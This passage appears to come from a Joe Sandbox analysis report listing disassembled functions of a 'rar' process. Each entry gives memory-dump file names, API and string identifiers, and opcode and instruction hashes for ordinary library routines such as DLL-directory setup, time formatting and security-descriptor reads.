                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                                                                                        • String ID: rar -ioff
                                                                                                                                                                                                                                        • API String ID: 4151682896-4089728129
                                                                                                                                                                                                                                        • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                        • Instruction ID: d020374f489242e1f44c3aae2a8b8c856c14b486015e945f7777a3879e580c92
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2301D128E2FA57E2FB56DF71E9901382361AF45701F4884BBD80EC22A0DE3C6C4B8604
                                                                                                                                                                                                                                        Function 00007FF6AA1CB470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                        • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                        • API String ID: 667068680-1824683568
                                                                                                                                                                                                                                        • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                        • Instruction ID: f4392e3d0bebe39c0cadeba7aad94156288d72b98eae979b35fb8376bd3350f9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93F01225B0A7C6E1E946DB11F8540795360AF49BC0B48507BED1E87764EE6CED46C300
                                                                                                                                                                                                                                        Function 00007FF6AA1E1ADC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: +$-
                                                                                                                                                                                                                                        • API String ID: 3215553584-2137968064
                                                                                                                                                                                                                                        • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                                        • Instruction ID: 4e46b49f1bf7532a80a4512348d80ec450fedc4e3837e4c1b8f8e61aa74bc50c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E912B436E0A143E5FF369A1590546F96295FB22764FC84673D69EC3AC0DF2CEE928304
                                                                                                                                                                                                                                        Function 00007FF6AA19E49C Relevance: 9.1, APIs: 6, Instructions: 148COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2092471728-0
                                                                                                                                                                                                                                        • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                        • Instruction ID: 9870e5e2d15eb6fbf996de1b1cea73eb17055262154197dc0d9287d0db86b9e1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D519436609781D6EB71CF25E54056A77A5FB84B94F100236EA9D83BD8DF3DD846CB00
                                                                                                                                                                                                                                        Function 00007FF6AA1CBC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2092733347-0
                                                                                                                                                                                                                                        • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                        • Instruction ID: cc792fe6b00af76986d0c79b04d037c1b1933ca57ea3961bbb60a0fad2ab8917
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F5149B2B15655DAEB54CFB5D4805AC37B1FB08788B50403ADE0E97B58EE38E956CB00
                                                                                                                                                                                                                                        Function 00007FF6AA1CC254 Relevance: 9.1, APIs: 6, Instructions: 81timeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2092733347-0
                                                                                                                                                                                                                                        • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                        • Instruction ID: 9f38b388252a4c9fcc8a26f3cc34f716d8ce13f42c027591e3ecc1e7c735e76a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F313862B15651DAEB01CFB4D8901AC3774FF08B48B54502BEE0E97A68EF38D996C314
                                                                                                                                                                                                                                        Function 00007FF6AA1BEB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                                        • API String ID: 0-13699710
                                                                                                                                                                                                                                        • Opcode ID: b327c31f0af7d37da6402c75e015e29487d24a11651d10baa52d84966eddba00
                                                                                                                                                                                                                                        • Instruction ID: 8689b3ab021dc8b8ec8822669e5406e16c8e88896c55f3f5fbb9634343fc70da
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b327c31f0af7d37da6402c75e015e29487d24a11651d10baa52d84966eddba00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50818221A0A682E5EA22EB25D4112F91792FF85784F4042B7D94D8B7CBDF6DEE07C340
                                                                                                                                                                                                                                        Function 00007FF6AA1DE0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                                        • String ID: csm$f
                                                                                                                                                                                                                                        • API String ID: 3913153233-629598281
                                                                                                                                                                                                                                        • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                        • Instruction ID: a5d08a77f05111895403c82670338dd948e49b8ca15788dd6440c10e1e3aaa44
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9561DF36B0A242EAEB16DB25E444E7927D9FB44B85F148576DE0A87788DF38EC42C700
                                                                                                                                                                                                                                        Function 00007FF6AA19EA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                                        • String ID: $ACL
                                                                                                                                                                                                                                        • API String ID: 2361174398-1852320022
                                                                                                                                                                                                                                        • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                        • Instruction ID: 74a5a5cfb84d7eee4d4e00aaccb69ed89a8ea762b6718a801e70f7b166e6da51
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C318461A0AB81E1E721DB11E5503E963A5FF88784F844077DA8D8379ADF3CEA16C740
                                                                                                                                                                                                                                        Function 00007FF6AA187188 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                                                                                                                                                                                                        • String ID: CompareStringOrdinal$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 2522007465-2120454788
                                                                                                                                                                                                                                        • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                        • Instruction ID: 520feca61e1320640884c9c327fde26b8fb6366a6ede0e2de6962dd04ea6d59a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04219221A0F682D5E6529B51A94017862E2BF54BC0F5841B7EE5DC3A98EF2CED4B8300
                                                                                                                                                                                                                                        Function 00007FF6AA1CBE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                                                                                        • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                                                                                        • API String ID: 1364621626-1794493780
                                                                                                                                                                                                                                        • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
